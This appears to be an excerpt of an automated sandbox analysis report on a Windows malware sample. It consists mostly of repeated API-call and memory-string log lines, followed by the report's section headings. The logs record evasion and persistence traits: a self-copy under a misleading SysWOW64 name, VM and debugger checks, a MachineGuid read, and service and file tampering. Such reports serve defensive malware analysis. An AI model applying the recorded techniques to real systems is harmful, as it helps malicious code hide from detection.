Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,

Source: C:\Windows\splwow64.exe	Window / User API: threadDelayed 1077
Source: C:\Windows\splwow64.exe	Window / User API: threadDelayed 1077

Source: C:\Windows\System32\svchost.exe TID: 1156	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1156	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe	File opened: PhysicalDrive0
Source: C:\Windows\System32\svchost.exe	File opened: PhysicalDrive0

Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,

Source: svchost.exe, 00000003.00000002.484675123.0000028B6F660000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000005.00000002.280073858.0000022EC5E60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.293855513.0000025973A60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.483871525.0000026801340000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000003.00000002.482245435.0000028B6A029000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW ofo
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000003.341262791.0000000003627000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.484638353.0000028B6F653000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.482240713.000001E91B602000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.486279195.0000000003616000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWHfa
Source: svchost.exe, 00000005.00000002.280073858.0000022EC5E60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.293855513.0000025973A60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.483871525.0000026801340000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000005.00000002.280073858.0000022EC5E60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.293855513.0000025973A60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.483871525.0000026801340000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000007.00000002.482320514.000001E91B640000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.481981398.0000026800668000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.482362022.0000029E4AE29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000005.00000002.280073858.0000022EC5E60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.293855513.0000025973A60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.483871525.0000026801340000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 00000003.00000002.484675123.0000028B6F660000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000005.00000002.280073858.0000022EC5E60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.293855513.0000025973A60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.483871525.0000026801340000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000003.00000002.482245435.0000028B6A029000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW ofo
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000003.341262791.0000000003627000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.484638353.0000028B6F653000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.482240713.000001E91B602000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.486279195.0000000003616000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWHfa
Source: svchost.exe, 00000005.00000002.280073858.0000022EC5E60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.293855513.0000025973A60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.483871525.0000026801340000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000005.00000002.280073858.0000022EC5E60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.293855513.0000025973A60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.483871525.0000026801340000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000007.00000002.482320514.000001E91B640000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.481981398.0000026800668000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.482362022.0000029E4AE29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000005.00000002.280073858.0000022EC5E60000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.293855513.0000025973A60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.483871525.0000026801340000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A4E20 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A3F20 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A4E20 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A3F20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF3F20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF4E20 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A36B0 _snwprintf,GetProcessHeap,DeleteFileW,DeleteFileW,
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A36B0 _snwprintf,GetProcessHeap,DeleteFileW,DeleteFileW,

Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.482882260.0000000000E10000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.482613678.000002DF09C60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.482882260.0000000000E10000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.482613678.000002DF09C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.482882260.0000000000E10000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.482613678.000002DF09C60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.482882260.0000000000E10000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.482613678.000002DF09C60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.482882260.0000000000E10000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.482613678.000002DF09C60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.482882260.0000000000E10000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.482613678.000002DF09C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.482882260.0000000000E10000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.482613678.000002DF09C60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: SystemPropertiesDataExecutionPrevention.exe, 00000002.00000002.482882260.0000000000E10000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.482613678.000002DF09C60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A8240 CreateFileW,CreateFileW,GetModuleFileNameW,GetSystemTimeAsFileTime,CloseHandle,
Source: C:\Users\user\Desktop\5e8fYZ8TM6.exe	Code function: 0_2_022A8240 CreateFileW,CreateFileW,GetModuleFileNameW,GetSystemTimeAsFileTime,CloseHandle,

Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5360 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Code function: 2_2_02AF5360 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,

Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\unenrollhook\SystemPropertiesDataExecutionPrevention.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 5e8fYZ8TM6

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Spreading:

Networking:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings: